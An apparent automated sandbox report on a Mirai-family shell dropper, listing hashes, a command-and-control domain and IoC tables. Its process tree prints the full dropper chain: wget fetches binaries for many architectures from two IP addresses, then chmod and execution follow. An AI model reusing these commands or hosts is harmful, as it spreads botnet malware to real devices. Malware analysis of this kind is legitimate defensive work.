Analysis
max time kernel: 176s
max time network: 178s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 02/09/2024, 01:10
Static task: static1
Behavioral task: behavioral1 (sample: 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown, resource: ubuntu1804-amd64-20240611-en)
Behavioral task: behavioral2 (sample: 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown, resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (sample: 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown, resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (sample: 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown, resource: debian9-mipsel-20240418-en)
General
Target: 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
Size: 8KB
MD5: 86311599eaaff9e71ddc72ada1b21c2e
SHA1: 572f97e41071d072dfc97127454d4978b50a81e2
SHA256: 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1
SHA512: 74fccf9b268bdcf4220dcd8213a83213b7be545bfaf7cf406f32bf7e7c924ef53d66d04cb3aeb4c8024c60803ce806ddfb501ad0d59780780fc9dd19f40df317
SSDEEP: 96:RE+blpgA856Hslefac5h5k9vH658TuF4dZAkk59yKXMJeDMhsm/vj+9RlYz218Lu:RE+P7
Malware Config
Extracted
mirai
www.akck.ru
Signatures
Executes dropped EXE (9 IoCs)
ioc | pid | Process
/bin/feankzzyx | 752 | feankzzyx
/bin/feankzzyx | 756 | feankzzyx
/bin/feankzzyx | 760 | feankzzyx
/bin/feankzzyx | 764 | feankzzyx
/bin/feankzzyx | 779 | feankzzyx
/bin/feankzzyx | 797 | feankzzyx
/bin/feankzzyx | 816 | feankzzyx
/bin/feankzzyx | 825 | feankzzyx
/bin/feankzzyx | 829 | feankzzyx

Writes file to system bin folder (1 TTPs, 14 IoCs)
description | ioc | Process
File opened for modification | /bin/feankzzyx | wget
File opened for modification | /bin/feankzzyx | wget
File opened for modification | /bin/ALLAH_IS_EVIL.txt | 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification | /bin/feankzzyx | wget
File opened for modification | /bin/feankzzyx | wget
File opened for modification | /bin/firmware_v4?user=root&dir=%2Fbin | wget
File opened for modification | /bin/feankzzyx | wget
File opened for modification | /bin/allah_is_satan | 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification | /bin/feankzzyx | wget
File opened for modification | /bin/feankzzyx | wget
File opened for modification | /bin/feankzzyx | wget
File opened for modification | /bin/feankzzyx | wget
File opened for modification | /bin/feankzzyx | 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown
File opened for modification | /bin/current_user2 | 85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown

Changes its process name (1 IoCs)
description | ioc | pid | Process
Changes the process name, possibly in an attempt to hide itself | bs | 829 | feankzzyx

Reads runtime system information (3 IoCs)
Reads data from /proc virtual filesystem.
description | ioc | Process
File opened for reading | /proc/filesystems | id
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/sys/kernel/ngroups_max | id
Processes
/tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown (PID 714) | cmdline: /tmp/85fa682965abee90f408841d28da35aa16ef5432b3d8f4d18839356febf9c4e1.unknown | Writes file to system bin folder
  /usr/bin/id (PID 717) | cmdline: id | Reads runtime system information
  /bin/sed (PID 718) | cmdline: sed -n "s/^uid=[0-9]\\+(\\([^)]\\+\\)).*/\\1/p" | Reads runtime system information
  /usr/bin/whoami (PID 725) | cmdline: whoami
  /usr/bin/wget (PID 728) | cmdline: wget "http://45.152.112.46/firmware_v4?user=root&dir=/bin" | Writes file to system bin folder
  /usr/bin/wget (PID 739) | cmdline: wget http://45.159.211.121/firmware/firmware.x86_64 -O feankzzyx | Writes file to system bin folder
  /bin/chmod (PID 751) | cmdline: chmod 0755 ./feankzzyx
  /bin/feankzzyx (PID 752) | cmdline: ./feankzzyx | Executes dropped EXE
  /usr/bin/wget (PID 754) | cmdline: wget http://45.159.211.121/firmware/firmware.armv4l -O feankzzyx | Writes file to system bin folder
  /bin/chmod (PID 755) | cmdline: chmod 0755 ./feankzzyx
  /bin/feankzzyx (PID 756) | cmdline: ./feankzzyx | Executes dropped EXE
  /usr/bin/wget (PID 758) | cmdline: wget http://45.159.211.121/firmware/firmware.armv5l -O feankzzyx | Writes file to system bin folder
  /bin/chmod (PID 759) | cmdline: chmod 0755 ./feankzzyx
  /bin/feankzzyx (PID 760) | cmdline: ./feankzzyx | Executes dropped EXE
  /usr/bin/wget (PID 762) | cmdline: wget http://45.159.211.121/firmware/firmware.armv6l -O feankzzyx | Writes file to system bin folder
  /bin/chmod (PID 763) | cmdline: chmod 0755 ./feankzzyx
  /bin/feankzzyx (PID 764) | cmdline: ./feankzzyx | Executes dropped EXE
  /usr/bin/wget (PID 766) | cmdline: wget http://45.159.211.121/firmware/firmware.armv7l -O feankzzyx | Writes file to system bin folder
  /bin/chmod (PID 777) | cmdline: chmod 0755 ./feankzzyx
  /bin/feankzzyx (PID 779) | cmdline: ./feankzzyx | Executes dropped EXE
  /usr/bin/wget (PID 782) | cmdline: wget http://45.159.211.121/firmware/firmware.i586 -O feankzzyx | Writes file to system bin folder
  /bin/chmod (PID 795) | cmdline: chmod 0755 ./feankzzyx
  /bin/feankzzyx (PID 797) | cmdline: ./feankzzyx | Executes dropped EXE
  /usr/bin/wget (PID 800) | cmdline: wget http://45.159.211.121/firmware/firmware.i686 -O feankzzyx | Writes file to system bin folder
  /bin/chmod (PID 815) | cmdline: chmod 0755 ./feankzzyx
  /bin/feankzzyx (PID 816) | cmdline: ./feankzzyx | Executes dropped EXE
  /usr/bin/wget (PID 819) | cmdline: wget http://45.159.211.121/firmware/firmware.m68k -O feankzzyx | Writes file to system bin folder
  /bin/chmod (PID 824) | cmdline: chmod 0755 ./feankzzyx
  /bin/feankzzyx (PID 825) | cmdline: ./feankzzyx | Executes dropped EXE
  /usr/bin/wget (PID 827) | cmdline: wget http://45.159.211.121/firmware/firmware.mips -O feankzzyx | Writes file to system bin folder
  /bin/chmod (PID 828) | cmdline: chmod 0755 ./feankzzyx
  /bin/feankzzyx (PID 829) | cmdline: ./feankzzyx | Executes dropped EXE; Changes its process name
Network
MITRE ATT&CK Enterprise v15
Downloads